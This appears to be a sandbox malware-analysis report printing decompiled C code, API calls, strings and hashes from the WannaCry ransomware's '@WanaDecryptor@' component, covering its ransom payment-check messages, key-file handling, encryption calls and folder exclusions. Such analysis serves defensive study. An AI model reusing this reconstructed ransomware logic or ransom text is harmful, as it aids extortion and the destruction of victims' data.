                                  0x00408967
                                  0x0040896d
                                  0x0040896f
                                  0x00408974
                                  0x00408976
                                  0x00408978
                                  0x00408978
                                  0x00408982
                                  0x00408988
                                  0x004089d3
                                  0x004089d7
                                  0x004089d9
                                  0x004089d9
                                  0x004089ec
                                  0x0040898a
                                  0x0040899e
                                  0x004089a5
                                  0x004089c2
                                  0x004089a7
                                  0x004089b0
                                  0x004089b0
                                  0x004089a5
                                  0x00408a05
                                  0x00408a0b
                                  0x00408a17
                                  0x00408a21
                                  0x00408a6b
                                  0x00408a6f
                                  0x00408a73
                                  0x00408a23
                                  0x00408a23
                                  0x00408a4b
                                  0x00408a54
                                  0x00408a59
                                  0x00408a5e
                                  0x00408a5e
                                  0x00408a21
                                  0x00408af5
                                  0x00408af9
                                  0x00408b02
                                  0x00408b09
                                  0x00408b15
                                  0x00408b20
                                  0x00408b2f
                                  0x00408b3c

                                  APIs
                                  • #470.MFC42 ref: 00408708
                                  • GetClientRect.USER32(?,?), ref: 0040871F
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
                                  • #6734.MFC42(?,?), ref: 00408746
                                  • #323.MFC42(?,?), ref: 0040874F
                                  • CreateCompatibleDC.GDI32(?), ref: 004087D2
                                  • #1640.MFC42(00000000), ref: 004087DD
                                    • Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
                                    • Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E
                                    • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D
                                  • #6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
                                  • FillRect.USER32(?,?,?), ref: 0040887D
                                  • #2754.MFC42(?,?), ref: 00408892
                                  • #2381.MFC42(?,?,?), ref: 0040889F
                                  • #3797.MFC42(?,?,?), ref: 004088C0
                                  • _ftol.MSVCRT ref: 00408951
                                  • _ftol.MSVCRT ref: 0040896F
                                  • FillRect.USER32(?,00000000,00000000), ref: 004089B0
                                  • #640.MFC42(?,?,?), ref: 00408B09
                                  • #755.MFC42(?,?,?), ref: 00408B20
                                    • Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3
                                    • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Rect$#5785CompatibleCreateFill_ftol$#1640#1641#2381#2754#323#3797#470#6194#640#6734#755BitmapClientMessageSend
                                  • String ID: \gA$fA$fA
                                  • API String ID: 1027735583-2217880857
                                  • Opcode ID: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
                                  • Instruction ID: b72dd9534e9f1d52b621f8c4883ea919de29669ae4f9aefa89eb3b477b52946b
                                  • Opcode Fuzzy Hash: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
                                  • Instruction Fuzzy Hash: 33D12CB16083419FC314DF25C984AAFBBE9BBC8304F508E2EF1D993291DB749949CB56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402AF0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 133COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _wcsicmp$_wcsnicmpwcsstr
                                  • String ID: This folder protects against ransomware. Modifying it will reduce protection$Content.IE5$N(@$Temporary Internet Files$\AppData\Local\Temp$\Intel$\Local Settings\Temp$\Program Files$\Program Files (x86)$\ProgramData$\WINDOWS
                                  • API String ID: 2817753184-2613825984
                                  • Opcode ID: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                  • Instruction ID: 690a6d88e0cbcba8c0a0bc490ea4abea364cf6131422823267360e98b5ddcfca
                                  • Opcode Fuzzy Hash: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                  • Instruction Fuzzy Hash: 3831843235162023D520691D7D4AFCB638C8FE5727F554033FD44E52C1E29EB96A82BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401760 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 140filesynchronizationthreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E00401760(void* __ecx) {
				int _v8;
				intOrPtr _v12;
				char _v20;
				struct _IO_FILE* _v32;
				void _v2059;
				void _v2060;
				void _v2571;
				void _v2572;
				char _v2576;
				char _v2604;
				void* _v2608;
				char _v2616;
				void* _v2636;
				void* _v2640;
				void* _t36;
				struct _IO_FILE* _t37;
				signed int _t38;
				unsigned int _t45;
				signed int _t49;
				void* _t50;
				signed int _t67;
				struct _IO_FILE* _t87;
				void* _t94;
				void* _t97;
				intOrPtr _t98;
				void* _t99;

				_push(0xffffffff);
				_push(E004134C6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t98;
				_t99 = _t98 - 0xa28;
				_t94 = __ecx;
				L00412CD4();
				_t36 =  *(__ecx + 0xac);
				if(_t36 != 0) {
					WaitForSingleObject(_t36, 0xbb8);
					TerminateThread( *(_t94 + 0xac), 0);
					CloseHandle( *(_t94 + 0xac));
				}
				_t37 = E0040C670();
				if( *((intOrPtr*)(_t94 + 0xb4)) != 0) {
					L15:
					 *[fs:0x0] = _v12;
					return _t37;
				} else {
					_t37 =  *(_t94 + 0xa8);
					if(_t37 != 1) {
						if(_t37 != 0xffffffff) {
							if(_t37 != 2) {
								goto L15;
							}
							_push(0);
							_push(0x40);
							_push("Congratulations! Your payment has been checked!\nStart decrypting now!");
							L14:
							L00412CC8();
							goto L15;
						}
						if( *((intOrPtr*)(_t94 + 0xa0)) == 0) {
							L11:
							_push(0);
							_push(0xf0);
							_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
							goto L14;
						}
						_t38 = rand();
						asm("cdq");
						_t37 = _t38 / 3;
						if(_t38 % 3 != 0) {
							goto L11;
						}
						_push(0);
						_push(0x30);
						_push("Failed to check your payment!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
						goto L14;
					}
					_v2572 = 0;
					memset( &_v2571, 0, 0x7f << 2);
					asm("stosw");
					asm("stosb");
					_v2060 = 0;
					memset( &_v2059, 0, 0x1ff << 2);
					asm("stosw");
					asm("stosb");
					sprintf( &_v2604, "%08X.dky", 0);
					_t37 = fopen( &_v2604, "rb");
					_t87 = _t37;
					_t99 = _t99 + 0x2c;
					if(_t87 == 0) {
						_push(0);
						_push(0xf0);
						_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
						L00412CC8();
						 *(_t94 + 0xa8) = 0xffffffff;
					} else {
						_t45 = fread( &_v2060, 1, 0x800, _t87);
						fclose(_t87);
						DeleteFileA( &_v2604);
						_t97 =  &_v2060;
						_t67 = _t45 >> 2;
						_t49 = memcpy( &_v2572, _t97, _t67 << 2);
						_push("You have a new message:\n");
						_t50 = memcpy(_t97 + _t67 + _t67, _t97, _t49 & 0x00000003);
						_t99 = _t99 + 0x2c;
						L00412CAA();
						_push( &_v2576);
						_push(_t50);
						_push( &_v2616);
						_v8 = 0;
						L00412CCE();
						_t37 =  *_t50;
						_push(0);
						_push(0x40);
						_push(_t37);
						_v20 = 1;
						L00412CC8();
						_v32 = 0;
						L00412CC2();
						_v32 = 0xffffffff;
						L00412CC2();
					}
					goto L15;
				}
			}





























                                  0x00401766
                                  0x00401768
                                  0x0040176d
                                  0x0040176e
                                  0x00401775
                                  0x0040177e
                                  0x00401780
                                  0x00401785
                                  0x0040178f
                                  0x00401797
                                  0x004017a5
                                  0x004017b2
                                  0x004017b2
                                  0x004017b8
                                  0x004017c3
                                  0x0040193e
                                  0x00401948
                                  0x00401955
                                  0x004017c9
                                  0x004017c9
                                  0x004017d2
                                  0x004018f9
                                  0x0040192f
                                  0x00000000
                                  0x00000000
                                  0x00401931
                                  0x00401932
                                  0x00401934
                                  0x00401939
                                  0x00401939
                                  0x00000000
                                  0x00401939
                                  0x00401901
                                  0x0040191f
                                  0x0040191f
                                  0x00401920
                                  0x00401925
                                  0x00000000
                                  0x00401925
                                  0x00401903
                                  0x00401909
                                  0x0040190f
                                  0x00401913
                                  0x00000000
                                  0x00000000
                                  0x00401915
                                  0x00401916
                                  0x00401918
                                  0x00000000
                                  0x00401918
                                  0x004017e3
                                  0x004017e7
                                  0x004017e9
                                  0x004017eb
                                  0x004017fa
                                  0x00401801
                                  0x00401803
                                  0x00401810
                                  0x00401811
                                  0x00401821
                                  0x00401827
                                  0x00401829
                                  0x0040182e
                                  0x004018da
                                  0x004018db
                                  0x004018e0
                                  0x004018e5
                                  0x004018ea
                                  0x00401834
                                  0x00401844
                                  0x0040184d
                                  0x0040185b
                                  0x00401863
                                  0x00401870
                                  0x00401873
                                  0x00401877
                                  0x0040187f
                                  0x0040187f
                                  0x00401885
                                  0x00401892
                                  0x00401893
                                  0x00401894
                                  0x00401895
                                  0x0040189c
                                  0x004018a1
                                  0x004018a3
                                  0x004018a4
                                  0x004018a6
                                  0x004018a7
                                  0x004018af
                                  0x004018b8
                                  0x004018bf
                                  0x004018c8
                                  0x004018d3
                                  0x004018d3
                                  0x00000000
                                  0x0040182e

                                  APIs
                                  • #6453.MFC42 ref: 00401780
                                  • WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
                                  • TerminateThread.KERNEL32(?,00000000), ref: 004017A5
                                  • CloseHandle.KERNEL32(?), ref: 004017B2
                                  • sprintf.MSVCRT ref: 00401811
                                  • fopen.MSVCRT ref: 00401821
                                  • fread.MSVCRT ref: 00401844
                                  • fclose.MSVCRT ref: 0040184D
                                  • DeleteFileA.KERNEL32(?), ref: 0040185B
                                  • #537.MFC42(You have a new message:), ref: 00401885
                                  • #924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
                                  • #1200.MFC42 ref: 004018AF
                                  • #800.MFC42 ref: 004018BF
                                  • #800.MFC42 ref: 004018D3
                                  • #1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5
                                  Strings
                                  • You have a new message:, xrefs: 00401877
                                  • %08X.dky, xrefs: 0040180A
                                  • You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
                                  • Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
                                  • Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1200#800$#537#6453#924CloseDeleteFileHandleObjectSingleTerminateThreadWaitfclosefopenfreadsprintf
                                  • String ID: %08X.dky$Congratulations! Your payment has been checked!Start decrypting now!$Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.$You have a new message:
                                  • API String ID: 2207195628-1375496427
                                  • Opcode ID: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                  • Instruction ID: 8b94a0d45af64711c1f2f56a46f7a966efbefe6460f93d7d0814001cf74dce0a
                                  • Opcode Fuzzy Hash: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                  • Instruction Fuzzy Hash: 1D41F371244740EFC330DB64C895BEB7699AB85710F404A3EF25AA32E0DABC5944CB6B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004012E0 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 202fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E004012E0(void* __ecx) {
				int _v4;
				intOrPtr _v12;
				void _v2059;
				void _v2060;
				void _v2192;
				void _v2196;
				intOrPtr _v2324;
				void _v2328;
				void _v2332;
				char _v2364;
				char _v2396;
				char _v2436;
				char _v2468;
				char _v2508;
				char _v2540;
				intOrPtr _t61;
				long _t65;
				struct _IO_FILE* _t83;
				int _t85;
				intOrPtr _t88;
				struct _IO_FILE* _t91;
				int _t97;
				void* _t100;
				char* _t123;
				void _t131;
				struct _IO_FILE* _t143;
				struct _IO_FILE* _t146;
				struct _IO_FILE* _t149;
				void* _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t161;
				void* _t164;
				void* _t166;
				void* _t169;
				void* _t172;

				_push(0xffffffff);
				_push(E004134A6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t161;
				_t61 =  *0x42189c; // 0x0
				_push(_t156);
				_t154 = __ecx;
				_t3 = _t61 + 0x50c; // 0x50c
				_t100 = _t3;
				sprintf( &_v2468, "%08X.pky",  *((intOrPtr*)(__ecx + 0xa4)));
				sprintf( &_v2540, "%08X.dky",  *((intOrPtr*)(_t154 + 0xa4)));
				_t164 = _t161 - 0x9e0 + 0x18;
				_t65 = GetFileAttributesA( &_v2540);
				_t157 = _t156 | 0xffffffff;
				if(_t65 == _t157) {
					L4:
					_v2196 = 0;
					memset( &_v2192, 0, 0x21 << 2);
					_t143 = fopen("00000000.res", "rb");
					_t166 = _t164 + 0x14;
					__eflags = _t143;
					if(_t143 != 0) {
						fread( &_v2196, 0x88, 1, _t143);
						fclose(_t143);
						_v2332 = 0;
						memset( &_v2328, 0, 0x21 << 2);
						sprintf( &_v2364, "%08X.res",  *((intOrPtr*)(_t154 + 0xa4)));
						_t146 = fopen( &_v2364, "rb");
						_t169 = _t166 + 0x34;
						__eflags = _t146;
						if(_t146 != 0) {
							fread( &_v2332, 0x88, 1, _t146);
							fclose(_t146);
							_t131 =  *0x421798; // 0x0
							_v2060 = _t131;
							memset( &_v2059, 0, 0x1ff << 2);
							asm("stosw");
							asm("stosb");
							sprintf( &_v2396, "%08X.eky",  *((intOrPtr*)(_t154 + 0xa4)));
							_t83 = fopen( &_v2396, "rb");
							_t149 = _t83;
							_t172 = _t169 + 0x34;
							__eflags = _t149;
							if(_t149 != 0) {
								_t85 = fread( &_v2060, 1, 0x800, _t149);
								fclose(_t149);
								_t39 = _t100 + 0x242; // 0x74e
								_t40 = _t100 + 0x1de; // 0x6ea
								E0040BE90("s.wnry", _t40, _t39);
								_t88 =  *0x42189c; // 0x0
								_push( *((intOrPtr*)(_t154 + 0x20)));
								_push( &_v2540);
								_push( *((intOrPtr*)(_t88 + 0x818)));
								_push( *((intOrPtr*)(_t88 + 0x81c)));
								_t46 = _t100 + 0xb2; // 0x5be
								_push(_t85);
								_push( &_v2060);
								_push(_v2324);
								_push( &_v2332);
								_push( &_v2196);
								_push(_t100 + 0xe4);
								_t91 = E0040C240( &_v2332, __eflags);
								_t172 = _t172 + 0x4c;
								_t83 = E0040C670();
								__eflags = _t91;
								if(_t91 >= 0) {
									E00404640( &_v2436);
									_v4 = 1;
									_t94 = E004047C0( &_v2436,  &_v2468,  &_v2540);
									__eflags = _t94;
									if(_t94 == 0) {
										 *(_t154 + 0xa8) = 1;
									} else {
										 *(_t154 + 0xa8) = 2;
									}
									_v4 = 0xffffffff;
									_t123 =  &_v2436;
									goto L15;
								}
							} else {
								 *(_t154 + 0xa8) = 0xffffffff;
							}
						} else {
							 *(_t154 + 0xa8) = 0xffffffff;
						}
					} else {
						 *(_t154 + 0xa8) = _t157;
					}
				} else {
					E00404640( &_v2508);
					_v4 = 0;
					if(E004047C0( &_v2508,  &_v2468,  &_v2540) == 0) {
						_t97 = DeleteFileA( &_v2540);
						_v4 = _t157;
						E00404690(_t97,  &_v2508);
						goto L4;
					} else {
						 *(_t154 + 0xa8) = 2;
						_v4 = _t157;
						_t123 =  &_v2508;
						L15:
						_t83 = E00404690(_t94, _t123);
					}
				}
				 *[fs:0x0] = _v12;
				return _t83;
			}







































                                  0x004012e6
                                  0x004012e8
                                  0x004012ed
                                  0x004012ee
                                  0x004012fb
                                  0x00401305
                                  0x00401307
                                  0x00401316
                                  0x00401316
                                  0x00401323
                                  0x00401339
                                  0x0040133b
                                  0x00401343
                                  0x00401349
                                  0x0040134e
                                  0x004013b0
                                  0x004013be
                                  0x004013d3
                                  0x004013db
                                  0x004013dd
                                  0x004013e0
                                  0x004013e2
                                  0x00401405
                                  0x00401408
                                  0x0040141c
                                  0x00401427
                                  0x00401440
                                  0x00401459
                                  0x0040145b
                                  0x0040145e
                                  0x00401460
                                  0x00401481
                                  0x00401484
                                  0x0040148a
                                  0x0040149e
                                  0x004014a8
                                  0x004014aa
                                  0x004014ac
                                  0x004014c1
                                  0x004014d4
                                  0x004014da
                                  0x004014dc
                                  0x004014df
                                  0x004014e1
                                  0x00401502
                                  0x00401507
                                  0x0040150d
                                  0x00401513
                                  0x00401520
                                  0x00401525
                                  0x0040152d
                                  0x0040153e
                                  0x0040153f
                                  0x00401547
                                  0x00401548
                                  0x00401556
                                  0x00401557
                                  0x0040155f
                                  0x00401567
                                  0x0040156e
                                  0x0040156f
                                  0x00401570
                                  0x00401575
                                  0x0040157a
                                  0x0040157f
                                  0x00401581
                                  0x00401587
                                  0x004015a2
                                  0x004015a9
                                  0x004015ae
                                  0x004015b0
                                  0x004015be
                                  0x004015b2
                                  0x004015b2
                                  0x004015b2
                                  0x004015c4
                                  0x004015cf
                                  0x00000000
                                  0x004015cf
                                  0x004014e3
                                  0x004014e3
                                  0x004014e3
                                  0x00401462
                                  0x00401462
                                  0x00401462
                                  0x004013e4
                                  0x004013e4
                                  0x004013e4
                                  0x00401350
                                  0x00401354
                                  0x00401367
                                  0x00401379
                                  0x0040139a
                                  0x004013a4
                                  0x004013ab
                                  0x00000000
                                  0x0040137b
                                  0x0040137b
                                  0x00401385
                                  0x0040138c
                                  0x004015d3
                                  0x004015d3
                                  0x004015d3
                                  0x00401379
                                  0x004015e3
                                  0x004015f0

                                  APIs
                                  • sprintf.MSVCRT ref: 00401323
                                  • sprintf.MSVCRT ref: 00401339
                                  • GetFileAttributesA.KERNEL32(?), ref: 00401343
                                  • DeleteFileA.KERNEL32(?), ref: 0040139A
                                  • fread.MSVCRT ref: 00401405
                                  • fclose.MSVCRT ref: 00401408
                                  • sprintf.MSVCRT ref: 00401440
                                  • fopen.MSVCRT ref: 00401453
                                    • Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A
                                  • fopen.MSVCRT ref: 004013D5
                                    • Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658
                                    • Part of subcall function 004047C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
                                    • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: sprintf$CriticalDeleteFileSectionfopen$AttributesCryptEncryptInitialize_local_unwind2fclosefread
                                  • String ID: %08X.dky$%08X.eky$%08X.pky$%08X.res$00000000.res$s.wnry
                                  • API String ID: 2787528210-4016014174
                                  • Opcode ID: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                  • Instruction ID: 5d668cda142e4e69bdcb8de65b1bf6b3866dc1aa9a0cfc7ced8feefa58b75360
                                  • Opcode Fuzzy Hash: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                  • Instruction Fuzzy Hash: 8A71BFB1104741AFD320DB60CC85FEBB3E9ABC4310F404A3EE59A87290EB78A4498B56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004035A0 Relevance: 36.2, APIs: 24, Instructions: 175windowclipboardmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E004035A0(intOrPtr __ecx) {
				int _t51;
				void* _t54;
				long _t55;
				signed int _t64;
				signed int _t68;
				void* _t71;
				int _t78;
				short _t86;
				signed int _t92;
				intOrPtr _t110;
				int _t121;
				void* _t122;
				void* _t123;
				void* _t126;
				void* _t128;
				intOrPtr _t129;
				void* _t130;
				void* _t132;
				void* _t134;

				_push(0xffffffff);
				_push(E0041365C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t129;
				_t130 = _t129 - 0x2e4;
				_t110 = __ecx;
				 *((intOrPtr*)(_t130 + 0x28)) = __ecx;
				_t51 = SendMessageA( *(__ecx + 0x80), 0x1004, 0, 0);
				if(_t51 != 0) {
					_t51 = OpenClipboard( *(_t110 + 0x20));
					if(_t51 != 0) {
						_t121 = 0;
						_t126 = 0;
						if(SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0) > 0) {
							do {
								_push(0);
								_t71 = _t130 + 0x18;
								_push(_t121);
								_push(_t71);
								L00412D7C();
								_push(0x4206e0);
								_push(_t71);
								_push(_t130 + 0x14);
								 *(_t130 + 0x308) = 0;
								L00412CCE();
								 *(_t130 + 0x2fc) = 2;
								L00412CC2();
								 *(_t130 + 0x2fc) = 0xffffffff;
								_t126 = _t126 +  *( *(_t130 + 0x10) - 8) * 2;
								L00412CC2();
								_t121 = _t121 + 1;
							} while (_t121 < SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0));
						}
						_t122 = GlobalAlloc(2, _t126 + 2);
						 *(_t130 + 0x14) = _t122;
						if(_t122 != 0) {
							_t54 = GlobalLock(_t122);
							 *(_t130 + 0x10) = _t54;
							if(_t54 != 0) {
								_t78 = 0;
								_t128 = 0;
								_t55 = SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0);
								if(_t55 > 0) {
									while(1) {
										_push(0);
										_push(_t78);
										_push(_t130 + 0x24);
										L00412D7C();
										_push(0x4206e0);
										_push(_t55);
										 *((intOrPtr*)(_t130 + 0x304)) = 3;
										_push(_t130 + 0x24);
										L00412CCE();
										 *(_t130 + 0x2fc) = 5;
										L00412CC2();
										_t86 =  *0x42179c; // 0x0
										 *(_t130 + 0x24) = _t86;
										memset(_t130 + 0x26, 0, 0xb3 << 2);
										_t132 = _t130 + 0xc;
										asm("stosw");
										MultiByteToWideChar(0, 0,  *(_t132 + 0x1c), 0xffffffff, _t130 + 0x24, 0x167);
										_t64 = wcslen(_t132 + 0x24);
										_t123 = _t132 + 0x28;
										_t92 = _t64 << 1 >> 2;
										memcpy(_t123 + _t92 + _t92, _t123, memcpy( *((intOrPtr*)(_t132 + 0x14)) + _t128, _t123, _t92 << 2) & 0x00000003);
										_t134 = _t132 + 0x18;
										_t68 = wcslen(_t134 + 0x28);
										_t130 = _t134 + 8;
										_t128 = _t128 + _t68 * 2;
										 *(_t130 + 0x2fc) = 0xffffffff;
										L00412CC2();
										_t78 = _t78 + 1;
										_t55 = SendMessageA( *( *((intOrPtr*)(_t130 + 0x18)) + 0x80), 0x1004, 0, 0);
										if(_t78 >= _t55) {
											break;
										}
										_t110 =  *((intOrPtr*)(_t130 + 0x18));
									}
									_t122 =  *(_t130 + 0x14);
								}
								 *((short*)( *(_t130 + 0x10) + _t128)) = 0;
								GlobalUnlock(_t122);
								EmptyClipboard();
								SetClipboardData(0xd, _t122);
							} else {
								GlobalFree(_t122);
							}
						}
						_t51 = CloseClipboard();
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t130 + 0x2f4));
				return _t51;
			}






















                                  0x004035a0
                                  0x004035a2
                                  0x004035ad
                                  0x004035ae
                                  0x004035b5
                                  0x004035c5
                                  0x004035d7
                                  0x004035db
                                  0x004035df
                                  0x004035e9
                                  0x004035f1
                                  0x004035fd
                                  0x00403607
                                  0x0040360d
                                  0x0040360f
                                  0x0040360f
                                  0x00403611
                                  0x00403615
                                  0x00403616
                                  0x0040361a
                                  0x0040361f
                                  0x00403628
                                  0x00403629
                                  0x0040362a
                                  0x00403635
                                  0x0040363e
                                  0x00403646
                                  0x00403653
                                  0x00403661
                                  0x00403665
                                  0x0040367a
                                  0x0040367d
                                  0x0040360f
                                  0x0040368d
                                  0x00403691
                                  0x00403695
                                  0x0040369c
                                  0x004036a4
                                  0x004036a8
                                  0x004036bc
                                  0x004036c6
                                  0x004036c8
                                  0x004036d0
                                  0x004036dc
                                  0x004036dc
                                  0x004036e2
                                  0x004036e3
                                  0x004036e7
                                  0x004036ec
                                  0x004036f1
                                  0x004036f6
                                  0x00403701
                                  0x00403702
                                  0x0040370b
                                  0x00403713
                                  0x00403718
                                  0x00403721
                                  0x00403733
                                  0x00403733
                                  0x00403735
                                  0x00403748
                                  0x00403753
                                  0x00403763
                                  0x0040376a
                                  0x00403774
                                  0x00403774
                                  0x0040377b
                                  0x00403781
                                  0x00403788
                                  0x0040378c
                                  0x00403797
                                  0x004037af
                                  0x004037b1
                                  0x004037b9
                                  0x00000000
                                  0x00000000
                                  0x004036d8
                                  0x004036d8
                                  0x004037bf
                                  0x004037bf
                                  0x004037c8
                                  0x004037ce
                                  0x004037d4
                                  0x004037dd
                                  0x004036aa
                                  0x004036ab
                                  0x004036ab
                                  0x004036a8
                                  0x004037e3
                                  0x004037e3
                                  0x004035f1
                                  0x004037f4
                                  0x00403801

                                  APIs
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
                                  • OpenClipboard.USER32(?), ref: 004035E9
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
                                  • #3301.MFC42(?,00000000,00000000), ref: 0040361A
                                  • #924.MFC42 ref: 00403635
                                  • #800.MFC42 ref: 00403646
                                  • #800.MFC42 ref: 00403665
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
                                  • GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
                                  • GlobalLock.KERNEL32(00000000), ref: 0040369C
                                  • GlobalFree.KERNEL32(00000000), ref: 004036AB
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
                                  • #3301.MFC42(?,00000000,00000000), ref: 004036E7
                                  • #924.MFC42(00000000), ref: 00403702
                                  • #800.MFC42(00000000), ref: 00403713
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
